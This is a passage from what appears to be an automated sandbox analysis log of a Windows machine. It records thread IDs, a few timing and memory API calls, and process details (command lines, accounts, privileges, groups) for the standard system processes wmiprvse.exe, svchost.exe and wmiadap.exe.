"LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 93 os_tid = 0x8cc Thread: id = 94 os_tid = 0x8bc Thread: id = 95 os_tid = 0x8ac Thread: id = 96 os_tid = 0x89c [0116.558] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xfbdac0 | out: lpSystemTimeAsFileTime=0xfbdac0*(dwLowDateTime=0xd3d1fcd0, dwHighDateTime=0x1d62251)) [0116.558] GetCurrentProcessId () returned 0x84c [0116.558] GetCurrentThreadId () returned 0x89c [0116.558] GetTickCount () returned 0x114e2e0 [0116.558] QueryPerformanceCounter (in: lpPerformanceCount=0xfbdac8 | out: lpPerformanceCount=0xfbdac8*=23688339325) returned 1 [0116.559] malloc (_Size=0x100) returned 0x318e80 Thread: id = 97 os_tid = 0x88c Thread: id = 98 os_tid = 0x87c Thread: id = 99 os_tid = 0x85c Thread: id = 100 os_tid = 0x904 Thread: id = 115 os_tid = 0x30c Process: id = "9" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5f35c000" os_pid = "0x158" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0006413d" [0xc000000f] Thread: id = 124 os_tid = 0x7e8 Thread: id = 125 os_tid = 0x570 Thread: id = 126 os_tid = 0x320 Thread: id = 127 os_tid = 0x284 Thread: id = 128 os_tid = 0xa7c Thread: id = 129 os_tid = 0xa64 Thread: id = 130 os_tid = 0x9d4 Thread: id = 131 os_tid = 0x5b4 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24f0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 134 os_tid = 0x760 Thread: id = 135 os_tid = 0x630 Thread: id = 136 os_tid = 0xbc4 Thread: id = 137 os_tid = 0x924 Thread: id = 138 os_tid = 0xa94 Thread: id = 139 os_tid = 0x408 Thread: id = 140 os_tid = 0x138 Thread: id = 141 os_tid = 0x5f8 Thread: id = 142 os_tid = 0x5f0 Thread: id = 143 os_tid = 0x5ec Thread: id = 144 os_tid = 0x5d0 Thread: id = 145 os_tid = 0x12c Thread: id = 146 os_tid = 0x170 Thread: id = 147 os_tid = 0x3c0 Thread: id = 148 os_tid = 0x3b8 Thread: id = 149 os_tid = 0x3a8 Thread: id = 150 os_tid = 0x2fc Thread: id = 151 os_tid = 0x2f8 Thread: id = 152 os_tid = 0x2d4 Thread: id = 153 os_tid = 0x2cc Thread: id = 164 os_tid = 0xa78 Process: id = "11" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x6ad77000" os_pid = "0xa14" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x370" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 155 os_tid = 0x9b4 Thread: id = 156 os_tid = 0x964 Thread: id = 157 os_tid = 0x994 Thread: id = 158 os_tid = 0x9a4 Thread: id = 159 os_tid = 0x954 Thread: id = 160 os_tid = 0x944